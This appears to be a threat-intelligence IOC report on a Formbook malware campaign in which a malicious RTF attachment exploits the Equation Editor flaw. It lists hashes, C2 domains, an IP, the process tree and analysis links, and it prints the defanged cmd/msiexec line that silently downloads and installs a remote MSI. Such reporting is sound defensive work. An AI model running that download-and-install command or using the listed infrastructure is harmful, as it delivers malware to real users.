- #IOC #OptiData #VR #formbook #RTF11882 #exe2msi #opendir
- https://pastebin.com/H2mkW82S
- previous_contact:
- 22/04/19 https://pastebin.com/1FMBBK3N
- 26/02/19 https://pastebin.com/yLu1cL9K
- 15/11/18 https://pastebin.com/VFG89LnT
- 14/11/18 https://pastebin.com/D6VPDyyz
- FAQ:
- http://www.exetomsi.com/freeware
- attack_vector
- --------------
- email attach .doc (RTF) > 11882 > msiexec GET msi > install (broken)
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 167441aa99bbbe621a775528f8c20724c6091e65d80fdf700389f0c9af41ead7
- File name PO-20190507.doc [RTF]
- File size 311.08 KB (318542 bytes)
- SHA-256 1c9fe57b3adaa58d86bcc8f683d6496c1ce40ee468434d768543910e8442f999
- File name 1.msi [MSI Installer, Exe to msi converter free]
- File size 556 KB (569344 bytes)
- SHA-256 f6c6bed0e6a223f26de874256e0ce8443a6203634aa2d2871c0cbec73adcb397
- File name MSID06.tmp [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 530.5 KB (543232 bytes)
- activity
- **************
- PL_SCR h11p:\ joeing2{.} duckdns{.} org/joe/1.msi
- C2 h11p:\kvkhbw{.} com/jo/
- h11p:\7hprd{.} com/jo/
- h11p:\.atlanticpressftp{.} com/jo/
- h11p:\mohammadarif.info/jo/
- h11p:\tdoog{.} com/jo/
- h11p:\macounty{.} com/jo/
- h11p:\aufdemweg.one/jo/
- h11p:\interactivenetworksystems{.} com/jo/
- cmd.exe & /C CD C: & msiexec.exe /i h11p:\ joeing2{.} duckdns{.} org/joe/1.msi /quiet
- Error 1722. There is a problem with this Windows Installer package.
- A program run as part of the setup did not finish as expected.
- Contact your support personnel or package vendor.
- Action _B3D13F97_1369_417D_A477_B4C42B829328, location: C:\Windows\Installer\MSI49E9.tmp, command: /S
- === Logging stopped: ??.??.2019 11:24:24 ===
- netwrk
- --------------
- 23.249.162.144 joeing2{.} duckdns{.} org GET /joe/1.msi HTTP/1.1 Windows Installer
- comp
- --------------
- msiexec.exe 3096 TCP localhost 50104 23.249.162.144 80 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- ... [not children, another context]
- "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
- ... [not children, another context]
- C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
- C:\Windows\SysWOW64\msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
- ... [not children, another context]
- C:\Windows\system32\msiexec.exe
- "C:\Windows\Installer\MSI49E9.tmp" /S
- persist
- --------------
- n/a
- drop
- --------------
- C:\Windows\Installer\MSI49E9.tmp
- %temp%\MSI6769f.LOG
- # # #
- https://www.virustotal.com/gui/file/167441aa99bbbe621a775528f8c20724c6091e65d80fdf700389f0c9af41ead7/details
- https://www.virustotal.com/gui/file/1c9fe57b3adaa58d86bcc8f683d6496c1ce40ee468434d768543910e8442f999/details
- https://www.virustotal.com/gui/file/f6c6bed0e6a223f26de874256e0ce8443a6203634aa2d2871c0cbec73adcb397/details
- https://analyze.intezer.com/#/analyses/33fac682-f65f-4ecd-82c5-1abf759a07a7
- https://analyze.intezer.com/#/analyses/5b072d73-73f0-404a-ac75-3141ed972a9e
- https://www.virustotal.com/gui/file/e22634d0f10eb26fe0503478c8027a0eabe734006e664014ada5e09a58097e91/details
- https://analyze.intezer.com/#/analyses/2aaf18fe-3d54-4ca9-a002-32cad1f3f985
- VR